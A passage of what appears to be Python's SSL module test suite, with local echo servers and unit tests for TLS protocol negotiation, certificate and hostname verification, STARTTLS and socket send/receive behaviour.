else ssl.CERT_NONE)
if cacerts:
self.context.load_verify_locations(cacerts)
if certificate:
self.context.load_cert_chain(certificate)
if npn_protocols:
self.context.set_npn_protocols(npn_protocols)
if alpn_protocols:
self.context.set_alpn_protocols(alpn_protocols)
if ciphers:
self.context.set_ciphers(ciphers)
self.chatty = chatty
self.connectionchatty = connectionchatty
self.starttls_server = starttls_server
self.sock = socket.socket()
self.port = support.bind_port(self.sock)
self.flag = None
self.active = False
self.selected_npn_protocols = []
self.selected_alpn_protocols = []
self.shared_ciphers = []
self.conn_errors = []
threading.Thread.__init__(self)
self.daemon = True
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
self.stop()
self.join()
def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.sock.settimeout(0.05)
self.sock.listen()
self.active = True
if self.flag:
# signal an event
self.flag.set()
while self.active:
try:
newconn, connaddr = self.sock.accept()
if support.verbose and self.chatty:
sys.stdout.write(' server: new connection from '
+ repr(connaddr) + '\n')
handler = self.ConnectionHandler(self, newconn, connaddr)
handler.start()
handler.join()
except socket.timeout:
pass
except KeyboardInterrupt:
self.stop()
self.sock.close()
def stop(self):
self.active = False
class AsyncoreEchoServer(threading.Thread):
# this one's based on asyncore.dispatcher
class EchoServer (asyncore.dispatcher):
class ConnectionHandler (asyncore.dispatcher_with_send):
def __init__(self, conn, certfile):
self.socket = test_wrap_socket(conn, server_side=True,
certfile=certfile,
do_handshake_on_connect=False)
asyncore.dispatcher_with_send.__init__(self, self.socket)
self._ssl_accepting = True
self._do_ssl_handshake()
def readable(self):
if isinstance(self.socket, ssl.SSLSocket):
while self.socket.pending() > 0:
self.handle_read_event()
return True
def _do_ssl_handshake(self):
try:
self.socket.do_handshake()
except (ssl.SSLWantReadError, ssl.SSLWantWriteError):
return
except ssl.SSLEOFError:
return self.handle_close()
except ssl.SSLError:
raise
except OSError as err:
if err.args[0] == errno.ECONNABORTED:
return self.handle_close()
else:
self._ssl_accepting = False
def handle_read(self):
if self._ssl_accepting:
self._do_ssl_handshake()
else:
data = self.recv(1024)
if support.verbose:
sys.stdout.write(" server: read %s from client\n" % repr(data))
if not data:
self.close()
else:
self.send(data.lower())
def handle_close(self):
self.close()
if support.verbose:
sys.stdout.write(" server: closed connection %s\n" % self.socket)
def handle_error(self):
raise
def __init__(self, certfile):
self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
def start (self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'client_npn_protocol': s.selected_npn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_npn_protocols'] = server.selected_npn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
If *expect_success* is true, assert that the connection succeeds,
if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_SSLv23:
client_context.set_ciphers("ALL")
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(CERTFILE)
ctx.load_verify_locations(CERTFILE)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
@skip_if_broken_ubuntu_ssl
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
for protocol in PROTOCOLS:
if protocol in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
continue
with self.subTest(protocol=ssl._PROTOCOL_NAMES[protocol]):
context = ssl.SSLContext(protocol)
context.load_cert_chain(CERTFILE)
server_params_test(context, context,
chatty=True, connectionchatty=True)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_context.load_verify_locations(SIGNING_CA)
server_context.load_cert_chain(SIGNED_CERTFILE2)
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name='fakehostname')
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket(),
do_handshake_on_connect=False)
s.connect((HOST, server.port))
# getpeercert() raise ValueError while the handshake isn't
# done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
s.close()
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="localhost") as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(ssl.CertificateError,
"hostname 'invalid' doesn't match 'localhost'"):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
context.wrap_socket(s)
def test_wrong_cert(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
"wrongcert.pem")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_REQUIRED,
cacerts=CERTFILE, chatty=False,
connectionchatty=False)
with server, \
socket.socket() as sock, \
test_wrap_socket(sock,
certfile=certfile,
ssl_version=ssl.PROTOCOL_TLSv1) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_protocol_sslv23(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_SSLv23, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv23,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv23, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_SSLv23, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=CERTFILE)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, bytearray(100))
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
